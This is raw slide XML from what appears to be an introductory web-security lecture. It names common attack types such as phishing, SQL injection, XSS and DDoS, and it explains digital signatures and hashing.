            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2954696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types of attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484909" y="2234068"/>
            <a:ext cx="8561485" cy="4526886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>We will learn several modes of attacks and how to prevent those attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fool the users  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Network attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack the connection (e.g. steal password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Code injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack the server or browser (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>StoredXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ReflectedXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B68D8561-634E-9744-B99E-24C68859BD22}"/>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4057531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Possible Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443345" y="2286000"/>
            <a:ext cx="8286731" cy="4161600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>as well as transport security, there are many other ways that sensitive information can be put at risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>poorly-designed web sites may leave sensitive information visible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>poorly-written PHP scripts that are "attackable"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>poorly-configured web servers that are open to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>bugs in web server code that are discovered and then exploited</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0" err="1"/>
              <a:t>Autobots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t> - CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>DDOS(Distributed Denial of Service attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>)..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="captcha.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="19651" r="20630" b="5036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156837" y="5028839"/>
            <a:ext cx="2787247" cy="1829161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2D4A20-87DE-9A43-B35B-3A1447D4FDFD}"/>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="912342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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864382" y="2489200"/>
            <a:ext cx="7933254" cy="3530600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Why Website Security is Important?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A hacked site can cause serious damage to your business revenue and reputation. Hackers can steal user information, passwords, install malicious software, and can even distribute malware to your users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Worst, you may find yourself paying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to hackers just to regain access to your website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1134E899-9072-A543-847C-3D4AFBFC3432}"/>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3839568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64381" y="2489199"/>
            <a:ext cx="7240528" cy="3842327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in March 2016, Google reported that more than 50 million website users have been warned about a website they’re visiting may contain malware or steal information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Furthermore, Google blacklists around 20,000 websites for malware and around 50,000 for phishing each week.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your website is a business, then you need to pay extra attention to security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to how it’s the business owners responsibility to protect their physical store building, as an online business owner it is your responsibility to protect your business website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D724F4B-C683-5D45-9C59-1EAE26F88996}"/>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183985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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internet/Web security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C64BD44-501A-4B4B-BF2D-CE3493011C1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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3646485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a:xfrm>
            <a:off x="864381" y="2489199"/>
            <a:ext cx="7448345" cy="3828473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=SJJmoDZ3il8</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>SSL Certificate Explained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=FwIUkAwKzG8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ko-KR" dirty="0"/>
              <a:t>from 1:25)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.youtube.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>watch?v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SoAuKUMOZeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B495403E-2F91-0A46-ABD7-C40318557EE5}"/>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1902267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B235B-50EA-F047-8128-0C5CEE706765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3040380" y="2377440"/>
            <a:ext cx="3017520" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Thank you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Any Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FFA1F6B-7651-CD49-BBC1-72A77191FBE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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389286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Preventing the network attacks(2) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864382" y="2489200"/>
            <a:ext cx="7604704" cy="3530600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Digital Signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>Encryption reduces the possibility that web traffic will be readable if intercepted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>, but it doesn't address:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>tampering (modification of the data on the way through)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>misrepresentation (claiming to be someone you're not)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>these problems can be addressed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>digital signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0270638-9B7C-814C-AF17-F41E3E9DB45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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368117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864381" y="2489200"/>
            <a:ext cx="7419647" cy="3530600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>digital signatures rely on a one-way hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>an algorithm that produces a fixed-length number ("the hash") from the message to be sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-AU" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>hash algorithms are designed such that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>a small change in the original message generates a very different hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>the content of the original message cannot be determined from the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF3EC2F-881D-CF42-ABD3-8E4DAB910DAC}"/>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102357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864381" y="2489200"/>
            <a:ext cx="7637361" cy="3530600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>once the hash has been generated, it is encrypted with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>private key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>this can be decrypted at the receiver using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" b="1" dirty="0"/>
              <a:t>public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>the receiver generates a new hash from the received message, and compares this with the received </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>digital signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1800" dirty="0"/>
              <a:t>any difference means that the message has been tampered with, or a different private key was used to encrypt the signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03BB5F9C-8EEB-944A-8A18-809376310EA7}"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98715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a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
